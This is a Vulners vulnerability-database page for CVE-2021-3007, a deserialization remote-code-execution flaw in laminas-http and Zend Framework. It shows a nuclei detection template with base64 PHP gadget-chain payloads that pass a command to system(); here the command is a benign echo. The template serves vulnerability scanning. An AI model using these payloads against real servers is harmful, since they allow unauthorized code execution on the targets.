Lucene search
K

Laminas Project laminas-http - Remote Code Execution

🗓️ 07 Jul 2026 16:50:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 20 Views

Deserialization flaw in Laminas HTTP before 2.14.2 enables remote code execution via crafted data.

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Deserialization of Untrusted Data in Getlaminas Laminas-Http
5 Dec 202508:35
githubexploit
GithubExploit
Exploit for Deserialization of Untrusted Data in Getlaminas Laminas-Http
5 Dec 202510:43
githubexploit
ATTACKERKB
CVE-2021-3007
4 Jan 202103:15
attackerkb
ATTACKERKB
CVE-2020-7961
20 Mar 202000:00
attackerkb
Circl
CVE-2021-3007
4 Jan 202107:36
circl
CNNVD
Laminas Project laminas-http and Zend Framework Code Issues Vulnerabilities
3 Jan 202100:00
cnnvd
CNVD
MK-AUTH Cross-Site Request Forgery Vulnerability
8 Jan 202100:00
cnvd
Check Point Advisories
Zend Framework Remote Code Execution (CVE-2021-3007)
17 Jan 202100:00
checkpoint_advisories
CVE
CVE-2021-3007
4 Jan 202102:26
cve
Cvelist
CVE-2021-3007
4 Jan 202102:26
cvelist
Rows per page
id: CVE-2021-3007

info:
  name: Laminas Project laminas-http - Remote Code Execution
  author: 0xanis
  severity: critical
  description: |
    Laminas Project laminas-http < 2.14.2 and Zend Framework 3.0.0 contain a deserialization vulnerability caused by __destruct method in Zend\\Http\\Response\\Stream, letting attackers control content lead to remote code execution, exploit requires attacker-controlled serialized data.
  impact: |
    Attackers can execute arbitrary code remotely by controlling serialized content during deserialization.
  remediation: |
    Update to laminas-http 2.14.2 or later; note that Zend Framework is no longer supported.
  reference:
    - https://github.com/Ling-Yizhou/zendframework3-/blob/main/zend%20framework3%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%20rce.md
    - https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-3007
    cwe-id: CWE-502
    epss-score: 0.75313
    epss-percentile: 0.99455
    cpe: cpe:2.3:a:getlaminas:laminas-http:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: getlaminas
    product: laminas-http
    shodan-query: http.html:"laminas"
  tags: cve,cve2021,laminas,zend,rce,deserialization,vkev

flow: http(1) || http(2)

variables:
  rand: "{{to_lower(rand_base(5))}}"
  cmd: "echo {{rand}}"
  param: "hello"
  cmd_len: "{{len(cmd)}}"
  laminas_base_payload: "TzoyODoiTGFtaW5hc1xIdHRwXFJlc3BvbnNlXFN0cmVhbSI6Mjp7czoxMDoiACoAY2xlYW51cCI7YjoxO3M6MTM6IgAqAHN0cmVhbU5hbWUiO086Mjg6IkxhbWluYXNcVmlld1xIZWxwZXJcR3JhdmF0YXIiOjI6e3M6NzoiACoAdmlldyI7TzozMzoiTGFtaW5hc1xWaWV3XFJlbmRlcmVyXFBocFJlbmRlcmVyIjoxOntzOjQ0OiIATGFtaW5hc1xWaWV3XFJlbmRlcmVyXFBocFJlbmRlcmVyAF9faGVscGVycyI7TzoyMToiTGFtaW5hc1xDb25maWdcQ29uZmlnIjoxOntzOjc6IgAqAGRhdGEiO2E6Mjp7czoxMDoiZXNjYXBlaHRtbCI7czo2OiJzeXN0ZW0iO3M6MTQ6ImVzY2FwZWh0bWxhdHRyIjtzOjc6InBocGluZm8iO319fXM6MTM6IgAqAGF0dHJpYnV0ZXMiO2E6MTp7"
  zend_base_payload: "TzoyNToiWmVuZFxIdHRwXFJlc3BvbnNlXFN0cmVhbSI6Mjp7czoxMDoiACoAY2xlYW51cCI7YjoxO3M6MTM6IgAqAHN0cmVhbU5hbWUiO086MjU6IlplbmRcVmlld1xIZWxwZXJcR3JhdmF0YXIiOjI6e3M6NzoiACoAdmlldyI7TzozMDoiWmVuZFxWaWV3XFJlbmRlcmVyXFBocFJlbmRlcmVyIjoxOntzOjQxOiIAWmVuZFxWaWV3XFJlbmRlcmVyXFBocFJlbmRlcmVyAF9faGVscGVycyI7TzoxODoiWmVuZFxDb25maWdcQ29uZmlnIjoxOntzOjc6IgAqAGRhdGEiO2E6Mjp7czoxMDoiZXNjYXBlaHRtbCI7czo2OiJzeXN0ZW0iO3M6MTQ6ImVzY2FwZWh0bWxhdHRyIjtzOjc6InBocGluZm8iO319fXM6MTM6IgAqAGF0dHJpYnV0ZXMiO2E6MTp7"
  laminas_cmd_part: '{{base64("s:" + cmd_len + ":\"" + cmd + "\";i:1;}}}")}}'
  zend_cmd_part: '{{base64("s:" + cmd_len + ":\"" + cmd + "\";i:1;}}}")}}'
  laminas_payload: "{{laminas_base_payload}}{{laminas_cmd_part}}"
  zend_payload: "{{zend_base_payload}}{{zend_cmd_part}}"

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        {{param}}={{laminas_payload}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "laminas", "{{rand}}")'
          - 'status_code == 200'
        condition: and

  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        {{param}}={{zend_payload}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "zend", "{{rand}}")'
          - 'status_code == 200'
        condition: and
# digest: 4b0a00483046022100aa081df852044c529120b52323efbf1a789ff445575117ceedf0295d59560ab1022100881c0cac4ccecd00cfbf3f11fea1fca04338b9d6c8ef9e0ecf5f558d48dfcb67:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.6High risk
Vulners AI Score7.6
CVSS 27.5
CVSS 3.19.8
EPSS0.75313
20